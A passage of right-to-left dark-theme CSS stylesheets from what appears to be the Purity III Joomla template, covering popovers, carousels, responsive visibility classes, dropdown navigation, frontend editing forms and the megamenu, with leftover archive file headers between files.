  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
}
.popover.right .arrow:after {
  content: " ";
  right: 1px;
  bottom: -10px;
  border-right-width: 0;
  border-left-color: #ffffff;
}
.popover.bottom .arrow {
  right: 50%;
  margin-right: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
  top: -11px;
}
.popover.bottom .arrow:after {
  content: " ";
  top: 1px;
  margin-right: -10px;
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.left .arrow:after {
  content: " ";
  left: 1px;
  border-left-width: 0;
  border-right-color: #ffffff;
  bottom: -10px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  overflow: hidden;
  width: 100%;
}
.carousel-inner > .item {
  display: none;
  position: relative;
  -webkit-transition: 0.6s ease-in-out right;
  transition: 0.6s ease-in-out right;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
  line-height: 1;
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  right: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  right: 100%;
}
.carousel-inner > .prev {
  right: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  right: 0;
}
.carousel-inner > .active.left {
  right: -100%;
}
.carousel-inner > .active.right {
  right: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  width: 15%;
  opacity: 0.5;
  filter: alpha(opacity=50);
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.5) 0%), color-stop(rgba(0, 0, 0, 0.0001) 100%));
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
}
.carousel-control.right {
  right: auto;
  left: 0;
  background-image: -webkit-linear-gradient(left, color-stop(rgba(0, 0, 0, 0.0001) 0%), color-stop(rgba(0, 0, 0, 0.5) 100%));
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-repeat: repeat-x;
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
}
.carousel-control:hover,
.carousel-control:focus {
  outline: none;
  color: #ffffff;
  text-decoration: none;
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  right: 50%;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  left: 50%;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  margin-top: -10px;
  margin-right: -10px;
  font-family: serif;
}
.carousel-control .icon-prev:before {
  content: '\2039';
}
.carousel-control .icon-next:before {
  content: '\203a';
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  right: 50%;
  z-index: 15;
  width: 60%;
  margin-right: -30%;
  padding-right: 0;
  list-style: none;
  text-align: center;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  border: 1px solid #ffffff;
  border-radius: 10px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
}
.carousel-indicators .active {
  margin: 0;
  width: 12px;
  height: 12px;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  right: 15%;
  left: 15%;
  bottom: 20px;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicons-chevron-left,
  .carousel-control .glyphicons-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -15px;
    margin-right: -15px;
    font-size: 30px;
  }
  .carousel-caption {
    right: 20%;
    left: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}
.clearfix:before,
.clearfix:after {
  content: " ";
  display: table;
}
.clearfix:after {
  clear: both;
}
.center-block {
  display: block;
  margin-right: auto;
  margin-left: auto;
}
.pull-right {
  float: left !important;
}
.pull-left {
  float: right !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
  visibility: hidden !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
tr.visible-xs,
th.visible-xs,
td.visible-xs {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-xs.visible-sm {
    display: block !important;
  }
  table.visible-xs.visible-sm {
    display: table;
  }
  tr.visible-xs.visible-sm {
    display: table-row !important;
  }
  th.visible-xs.visible-sm,
  td.visible-xs.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-xs.visible-md {
    display: block !important;
  }
  table.visible-xs.visible-md {
    display: table;
  }
  tr.visible-xs.visible-md {
    display: table-row !important;
  }
  th.visible-xs.visible-md,
  td.visible-xs.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-xs.visible-lg {
    display: block !important;
  }
  table.visible-xs.visible-lg {
    display: table;
  }
  tr.visible-xs.visible-lg {
    display: table-row !important;
  }
  th.visible-xs.visible-lg,
  td.visible-xs.visible-lg {
    display: table-cell !important;
  }
}
.visible-sm,
tr.visible-sm,
th.visible-sm,
td.visible-sm {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-sm.visible-xs {
    display: block !important;
  }
  table.visible-sm.visible-xs {
    display: table;
  }
  tr.visible-sm.visible-xs {
    display: table-row !important;
  }
  th.visible-sm.visible-xs,
  td.visible-sm.visible-xs {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-sm.visible-md {
    display: block !important;
  }
  table.visible-sm.visible-md {
    display: table;
  }
  tr.visible-sm.visible-md {
    display: table-row !important;
  }
  th.visible-sm.visible-md,
  td.visible-sm.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-sm.visible-lg {
    display: block !important;
  }
  table.visible-sm.visible-lg {
    display: table;
  }
  tr.visible-sm.visible-lg {
    display: table-row !important;
  }
  th.visible-sm.visible-lg,
  td.visible-sm.visible-lg {
    display: table-cell !important;
  }
}
.visible-md,
tr.visible-md,
th.visible-md,
td.visible-md {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-md.visible-xs {
    display: block !important;
  }
  table.visible-md.visible-xs {
    display: table;
  }
  tr.visible-md.visible-xs {
    display: table-row !important;
  }
  th.visible-md.visible-xs,
  td.visible-md.visible-xs {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-md.visible-sm {
    display: block !important;
  }
  table.visible-md.visible-sm {
    display: table;
  }
  tr.visible-md.visible-sm {
    display: table-row !important;
  }
  th.visible-md.visible-sm,
  td.visible-md.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-md.visible-lg {
    display: block !important;
  }
  table.visible-md.visible-lg {
    display: table;
  }
  tr.visible-md.visible-lg {
    display: table-row !important;
  }
  th.visible-md.visible-lg,
  td.visible-md.visible-lg {
    display: table-cell !important;
  }
}
.visible-lg,
tr.visible-lg,
th.visible-lg,
td.visible-lg {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-lg.visible-xs {
    display: block !important;
  }
  table.visible-lg.visible-xs {
    display: table;
  }
  tr.visible-lg.visible-xs {
    display: table-row !important;
  }
  th.visible-lg.visible-xs,
  td.visible-lg.visible-xs {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-lg.visible-sm {
    display: block !important;
  }
  table.visible-lg.visible-sm {
    display: table;
  }
  tr.visible-lg.visible-sm {
    display: table-row !important;
  }
  th.visible-lg.visible-sm,
  td.visible-lg.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-lg.visible-md {
    display: block !important;
  }
  table.visible-lg.visible-md {
    display: table;
  }
  tr.visible-lg.visible-md {
    display: table-row !important;
  }
  th.visible-lg.visible-md,
  td.visible-lg.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
.hidden-xs {
  display: block !important;
}
table.hidden-xs {
  display: table;
}
tr.hidden-xs {
  display: table-row !important;
}
th.hidden-xs,
td.hidden-xs {
  display: table-cell !important;
}
@media (max-width: 767px) {
  .hidden-xs,
  tr.hidden-xs,
  th.hidden-xs,
  td.hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-xs.hidden-sm,
  tr.hidden-xs.hidden-sm,
  th.hidden-xs.hidden-sm,
  td.hidden-xs.hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-xs.hidden-md,
  tr.hidden-xs.hidden-md,
  th.hidden-xs.hidden-md,
  td.hidden-xs.hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-xs.hidden-lg,
  tr.hidden-xs.hidden-lg,
  th.hidden-xs.hidden-lg,
  td.hidden-xs.hidden-lg {
    display: none !important;
  }
}
.hidden-sm {
  display: block !important;
}
table.hidden-sm {
  display: table;
}
tr.hidden-sm {
  display: table-row !important;
}
th.hidden-sm,
td.hidden-sm {
  display: table-cell !important;
}
@media (max-width: 767px) {
  .hidden-sm.hidden-xs,
  tr.hidden-sm.hidden-xs,
  th.hidden-sm.hidden-xs,
  td.hidden-sm.hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm,
  tr.hidden-sm,
  th.hidden-sm,
  td.hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-sm.hidden-md,
  tr.hidden-sm.hidden-md,
  th.hidden-sm.hidden-md,
  td.hidden-sm.hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-sm.hidden-lg,
  tr.hidden-sm.hidden-lg,
  th.hidden-sm.hidden-lg,
  td.hidden-sm.hidden-lg {
    display: none !important;
  }
}
.hidden-md {
  display: block !important;
}
table.hidden-md {
  display: table;
}
tr.hidden-md {
  display: table-row !important;
}
th.hidden-md,
td.hidden-md {
  display: table-cell !important;
}
@media (max-width: 767px) {
  .hidden-md.hidden-xs,
  tr.hidden-md.hidden-xs,
  th.hidden-md.hidden-xs,
  td.hidden-md.hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-md.hidden-sm,
  tr.hidden-md.hidden-sm,
  th.hidden-md.hidden-sm,
  td.hidden-md.hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md,
  tr.hidden-md,
  th.hidden-md,
  td.hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-md.hidden-lg,
  tr.hidden-md.hidden-lg,
  th.hidden-md.hidden-lg,
  td.hidden-md.hidden-lg {
    display: none !important;
  }
}
.hidden-lg {
  display: block !important;
}
table.hidden-lg {
  display: table;
}
tr.hidden-lg {
  display: table-row !important;
}
th.hidden-lg,
td.hidden-lg {
  display: table-cell !important;
}
@media (max-width: 767px) {
  .hidden-lg.hidden-xs,
  tr.hidden-lg.hidden-xs,
  th.hidden-lg.hidden-xs,
  td.hidden-lg.hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-lg.hidden-sm,
  tr.hidden-lg.hidden-sm,
  th.hidden-lg.hidden-sm,
  td.hidden-lg.hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-lg.hidden-md,
  tr.hidden-lg.hidden-md,
  th.hidden-lg.hidden-md,
  td.hidden-lg.hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg,
  tr.hidden-lg,
  th.hidden-lg,
  td.hidden-lg {
    display: none !important;
  }
}
.visible-print,
tr.visible-print,
th.visible-print,
td.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
  .hidden-print,
  tr.hidden-print,
  th.hidden-print,
  td.hidden-print {
    display: none !important;
  }
}
PKӜ�\5�K]]-purity_iii/css/rtl/dark/legacy-navigation.cssnu&1i�

.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu:hover > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 4px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
PKӜ�\�h4�**)purity_iii/css/rtl/dark/frontend-edit.cssnu&1i�

.com_config #templates-form .tip {
  background: #f5f5f5;
  padding: 12px 12px;
}
.com_config #templates-form textarea {
  height: auto;
  width: auto;
  min-height: 100px;
  min-width: 50%;
}
.com_config #templates-form .input-append .add-on,
.com_config #templates-form .input-prepend .add-on {
  width: 35px;
}
.com_config #templates-form .input-append input,
.com_config #templates-form .input-prepend input {
  display: inline-block;
}
.com_config #templates-form .input-append .btn,
.com_config #templates-form .input-prepend .btn {
  border: 1px solid #1f1f1f;
}
.com_config #templates-form .t3-admin-form-legend {
  display: none;
}
.com_config #templates-form .row-fluid .span6 {
  width: 100%;
}
@media (min-width: 768px) {
  .com_config #templates-form .control-group .control-label {
    width: 250px;
  }
  .com_config #templates-form .control-group .controls {
    margin-right: 280px;
  }
}
@media (min-width: 768px) {
  .edit .inputbox,
  .edit input[type="text"],
  .edit select.inputbox,
  .edit select {
    width: 250px;
  }
}
.edit textarea {
  width: 100%;
}
.edit .input-append,
.edit .input-prepend {
  display: block;
  width: auto;
}
@media (min-width: 768px) {
  .edit .input-append input[type="text"],
  .edit .input-prepend input[type="text"],
  .edit .input-append input.inputbox,
  .edit .input-prepend input.inputbox {
    display: inline-block;
    width: 210px;
  }
}
.edit .input-append .btn,
.edit .input-prepend .btn {
  border: 1px solid #1f1f1f;
  background-color: #2d2d2d;
}
.edit .nav-tabs {
  margin-bottom: 20px;
}
.edit .tab-pane:before,
.edit .tab-pane:after {
  content: " ";
  display: table;
}
.edit .tab-pane:after {
  clear: both;
}
#editor-xtd-buttons,
.toggle-editor {
  margin-top: 20px;
  margin-bottom: 20px;
}
#editor-xtd-buttons .btn,
.toggle-editor .btn {
  background-color: #2d2d2d;
  text-shadow: 0 1px 0 #fff;
  border-color: #1f1f1f;
}
#editor-xtd-buttons {
  margin-left: 30px;
}
#sbox-window {
  padding: 0;
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
}
.btn.jmodedit {
  padding: 0;
}
.btn.jmodedit:focus,
.btn.jmodedit:active {
  box-shadow: none;
}
.jfedit-menu + .tooltip {
  min-width: 100px;
}
.window form table {
  border: 1px solid #dddddd;
  background: #f9f9f9;
  margin-bottom: 20px;
}
.window form table td {
  padding: 8px;
}
.window form .help-block {
  font-size: 12px;
  clear: both;
  padding-top: 5px;
}
.window #imageForm {
  margin: 0;
  width: auto;
}
.window #imageForm .chzn-container {
  float: right;
}
.window #imageForm #upbutton {
  border: 1px solid #1f1f1f;
  float: right;
  padding: 3px 12px;
  margin-right: 5px;
}
.window #imageForm .pull-right {
  margin-left: 30px;
}
.window #uploadForm {
  width: auto;
}
.window #uploadForm #upload-file {
  margin: 10px 0;
}
.window .manager {
  margin: 0;
  padding: 0;
}
.window .manager:before,
.window .manager:after {
  content: " ";
  display: table;
}
.window .manager:after {
  clear: both;
}
.window .manager .thumbnail {
  float: right;
  margin-left: 10px;
  margin-right: 10px;
}
.t3onoff {
  width: 90px;
  height: 30px;
  white-space: nowrap;
  overflow: hidden;
  display: block;
  padding: 0;
  position: relative;
  border: 1px solid #aaa;
  border-radius: 0;
  

  

  

  

  

}
.t3onoff input[type=radio] {
  display: none;
}
.t3onoff label {
  width: 90px;
  height: 30px;
  overflow: hidden;
  display: block;
  border-radius: 0;
  position: absolute;
  top: -1px;
  right: -1px;
  z-index: 1;
  text-transform: uppercase;
  background: url(../../../../../plugins/system/t3/base-bs3/less/../imgs/blank.gif) no-repeat transparent;
  text-indent: -999em;
}
.t3onoff label:before,
.t3onoff label:after {
  display: block;
  position: absolute;
  top: 0;
  border-radius: 0;
  border: 1px solid #aaa;
  -webkit-transition: all 250ms;
  transition: all 250ms;
}
.t3onoff label:before {
  content: "ON";
  width: 100%;
  height: 100%;
  text-indent: 0;
  color: white;
  padding: 4px 18px;
  font-weight: normal;
}
.t3onoff label:after {
  content: "";
  width: 40%;
  height: 100%;
  background: #fff;
}
.t3onoff label.off:before {
  content: "OFF";
  text-align: left;
  color: #555;
}
.t3onoff label.active {
  z-index: 0;
}
.t3onoff label.off:before {
  background: #eee;
  right: 100%;
}
.t3onoff label.off.active:before {
  right: 0%;
}
.t3onoff label.on:before {
  background: #690;
  right: -100%;
}
.t3onoff label.on.active:before {
  right: 0%;
}
.t3onoff label.off:after {
  right: 60%;
}
.t3onoff label.off.active:after {
  right: 0%;
}
.t3onoff label.on:after {
  right: 0%;
}
.t3onoff label.on.active:after {
  right: 60%;
}

fieldset.radio.btn-group {
  padding: 0;
}
fieldset.radio.btn-group input {
  display: none;
}
fieldset.radio.btn-group label {
  display: inline-block;
  min-width: 54px;
  padding: 0 12px;
  border: 1px solid #aaa;
  line-height: 28px;
  background: #eee;
  color: #555;
  border-radius: 0;
  text-align: center;
  border-left-width: 0px;
  text-transform: uppercase;
}
fieldset.radio.btn-group label:last-child {
  border-left-width: 1px;
}
fieldset.radio.btn-group label.active {
  background: #690;
  border-color: #5c8b00;
  color: #fff;
}
.icon-eye-open:before,
.icon-eye:before {
  content: "\f06e";
}
.icon-file-add:before {
  content: "\f0f6";
}
.icon-cancel:before {
  content: "\f00d";
}
.button2-left,
.button2-left div {
  float: right;
}
.button2-right,
.button2-right div {
  float: left;
}
.button2-left {
  margin: 5px 0 0 5px;
}
.button2-right {
  margin: 5px 5px 0 0;
}
.button2-left a,
.button2-right a,
.button2-left span,
.button2-right span {
  background: #878787;
  border: 1px solid #7a7a7a;
  color: #5a5a5a;
  cursor: pointer;
  display: block;
  float: right;
  padding: 2px 10px;
  border-radius: 4px;
}
.button2-left span,
.button2-right span {
  color: #5a5a5a;
  cursor: default;
}
.button2-left .page a,
.button2-right .page a,
.button2-left .page span,
.button2-right .page span {
  padding: 0 6px;
}
.button2-left a:hover,
.button2-right a:hover {
  background: #7a7a7a;
  color: #2d2d2d;
  text-decoration: none;
}
.edit.item-page a.modal {
  display: inline-block;
  position: inherit;
  width: auto !important;
  top: auto !important;
  overflow: hidden;
}
.edit.item-page a.modal.btn {
  background: #2d2d2d;
  text-shadow: 0 1px 0 #fff;
  border-color: #1f1f1f;
  overflow: hidden;
}
.controls img.calendar {
  cursor: pointer;
  margin-right: 5px;
}
PKӜ�\Q4�5�5$purity_iii/css/rtl/dark/megamenu.cssnu&1i�

.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu:hover > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  content: " ";
  display: table;
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-right: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #2d2d2d;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-right: -5px;
  margin-left: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-left: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  right: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  right: auto;
  left: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  right: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  right: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  right: auto;
  left: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  right: 0;
  margin-right: 0;
  top: auto;
}
@media (min-width: 768px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    transition: all 400ms;
    display: block!important;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
  
    
  
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -100%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-right: -500px;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-right: 0;
  }
}
@media (max-width: 767px) {
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
